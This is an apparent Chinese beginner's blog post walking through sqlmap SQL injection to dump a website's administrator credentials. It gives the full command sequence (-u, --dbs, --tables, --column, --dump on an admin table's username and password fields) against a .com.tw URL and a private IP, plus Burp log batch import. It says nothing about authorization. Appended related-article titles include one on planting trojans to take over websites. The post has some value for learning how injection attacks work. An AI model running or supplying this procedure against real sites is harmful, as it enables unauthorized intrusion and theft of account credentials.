最近学长让用sqlmap获取一个网站的管理员账户和密码，一开始就很迷茫啊，毕竟对这些东西不是太了解，，可能是我懂得太少，，后来完成之后才发现是一件很简单的事，毕竟，学长给的是一个容易攻破的网站，，也不算是攻破，总之就是入门嘛。

SQL注入：就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。

首先sqlmap据说是一个开源的，很强大的，集检测和利用注入点于一身的工具，有python语言开发，用之前得装python环境。说是有检测功能但是并不能直接扫描网站找到注入点，但是可以批量导入，就是省了你的麻烦。但是说一体化好像牵强了一点。

至于批量导入这里借用一个大佬的方法，就是借用burpsuite的日志文件批量导入，

配置burpsuite下记录所有的request记录，并保存在指定文件夹，指定在sqlmap的目录下，然后python sqlmap.py -l 文件名 --batch -smart

sqlmap就能批量导入burp的log文件了--batch指默认都选yes，，-smart指启发式快速判断，节约时间。

最后能注入的url会保存到out文件夹下

注意：log文件中如果有sqlmap无法读取的字符（ascii码之外的字符）会读取失败。

找注入点的工具还是啊d名小子啥的比较方便，而且这些工具才真是一体化，感觉比sqlmap简单的多。

而手工找注入点，，，主要是根据返回值的不同，这里就不说了，有个工具多好（所以说有些人感觉很厉害，可能是人家工具到位，并不一定是技术很强，大佬，请自动忽略）

既然找到注入点了，一般就不用测试了，但是还是列一下

 sqlmap -u "http://192.168.1.150/products.asp?id=134"  

因为我这是linux系统所以直接调用，windows：

C:\Python27\sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134"

一般会扫描出数据库管理器的类型和操作系统啥的

接下来我就按linux来了。。

列出数据库

sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 --dbs

有时候可能会提示不成功，我学长给我的直接没有数据库，因为acc只有表，，，这就很尴尬，，

就是说没有数据库，试试只用--tables即列出表名

sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11  --tables

如果有数据库的话 加-D 数据库名

列表名有时候也不会成功，它会提示你是否用常规方法啥的，输y就对了，他用的方法好像是试错法，，具体你一试就知道了。

接着就是列字段，和列出指定字段了

sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost -T admin --column

sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost -T admin -C username，password --dump

导出后密码一般都不是明文，MD5啥的加密。。完事

至于后来用御剑啥的扫描登陆啥的就简单了

sqlmap命令补充：

参数：

--current-db列出当前使用数据库

--current-user当前用户

--user 列出所有用户

--password列出密码

PS：批量导入大佬的原文https://www.cnblogs.com/qmfsun/p/5654192.html

获取网站管理员账户密码？相关推荐

1. 给网站管理员的建议：创建可利用的、可抓取的网站

   转载自 谷歌中文网站管理员博客 发表者 T.V. Raman,研究学者 原文: Webmaster tips for creating accessible, crawlable sites 发表于: ...

2. 面向Web开发人员和网站管理员的Web缓存指南

   这是一篇知识性的文档,主要目的是为了让Web缓存相关概念更容易被开发者理解并应用于实际的应用环境中.为了简要起见,某些实现方面的细节被简化或省略了.如果你更关心细节实现则完全不必耐心看完本文,后面参考 ...

3. 获取网站后台权限理解

   文章目录 一.后台常见位置查找 1.1 猜解常用路径 1.2 robots.txt 1.3 访问报错页面 1.4 查看图片相关属性 1.5 CMS指纹识别 1.6 利用谷歌黑语法来查找 二.利用工具查 ...

4. alexa api php,PHP通过Alexa官方API获取网站Alexa排名 - 米扑博客

   Alexa 接口 Alexa的XML API接口是:http://data.alexa.com/data?cli=10&url=YOUR_DOMAIN_URL 查询结果如下: 如果想获取更多的 ...

5. seo同义词替换在线工具_8个免费的网站管理员在线SEO工具

   seo同义词替换在线工具 There are some great tools available to help webmasters with their SEO. Unfortunately, ...

6. WEB自动化（5）获取网站验证码即从验证码截图中获取图片中的字符串

   WEB自动化(1)环境安装及打开浏览器实例 WEB自动化(2)常用的元素定位方法之xpath详解 WEB自动化(3)PO设计模式原理与实现 WEB自动化(4)使用selenium将网站验证码截图保存为 ...

7. 植入木马获取网站权限

   获取网站权限 首先获得需操作网址(下面演示的是学校练习靶机) 打开网址,利用上篇所讲知识得到后台管理员权限,登入后台管理 随机寻找可注入点,找到注入点根目录位置 如图,这个就是随机找到的可植入木马位置 ...

8. 怎样获取网站的域名_搭建一个网站，通常的6大步骤你知道吗？

   怎样建网站?要搭建一个网站,通常有6个步骤.下面我们简单的介绍如何一步一步搭建网站. 第一步:注册域名 挑选网站地址,注册专属域名.注册域名的价格取决于具体用什么样的后缀域名搭建网站.目前可以选择的域 ...

9. curl用法：获取网站的header头及状态码

   curl命令最常用的方法是使用参数-I 获取域名或IP的header信息,包括HTTP返回状态码,server类型,文本类型,缓存时间等等:监控web服务时也常用此方法判断web服务是否正常: 监控w ...

最新文章

1. 不用面部识别？亚马逊准备推出人手支付，0.3秒刷手支付
2. c语言预处理器指令的简单例子
3. 数据库连接池性能比对(hikari druid c3p0 dbcp jdbc)
4. linux系统ubuntu有哪些,Ubuntu Linux操作系统至少适合五种人使用
5. 【二分】防具布置/秦腾与教学评估（ybtoj 二分-1-2/jzoj 1253/luogu 4403）
6. 数据结构之串：串的模式匹配
7. 蓝桥杯2017年第八届C/C++省赛C组第二题-兴趣小组
8. 天天Android： （EditText明文、密文切换）
9. django mysql处理_利用Django去操作数据库并完成简易的登录及编辑功能
10. Qt warning : 该文件包含不能在当前代码页(936)中表示的字符。请将该文件保存为 Unicode 格式以防止数据丢失
11. java url编码和js的url编码_Java URLEncoder与URLDecoder编码解码使用示例
12. PS替换证件照背景颜色
13. 【Opencv卸载与重装】NVIDIA Xavier NX下，卸载opencv3，重装opencv4
14. oracle hugepage设置,Linux系统下快速配置HugePages的完整步骤
15. php语言有哪些特性,盘点PHP编程语言具有的特性
16. 什么是注意力机制及其应用（self attention）？
17. Ballerina 1.0版增加了Java互操作性并以JVM为目标
18. MyBatis配置加密, 解密
19. 夜晚图像的目标检测-matlab
20. ECMAScript 6 简明教程（一文搞懂ES6）

热门文章

1. SQL（左连接，右连接，内连接）
2. 有趣可爱的小游戏分享，摸鱼必备
3. MraiaDb sql文件导入Mysql失败，报错：You have an error in your SQL syntax； check the manual that corresponds to
4. html span标签 不换行 字符换行问题
5. 【sfu】追踪ms如何提供flv服务
6. SpringBoot--配置Druid(德鲁伊)数据源监控
7. python的join函数的用法及实例
8. The Courage to Be Disliked by Ichiro Kishimi and Fumitake Koga
9. PHPAdmin中外键约束（关联字段的决定权）
10. 九十三、编写 代码 隐藏 iPhone键盘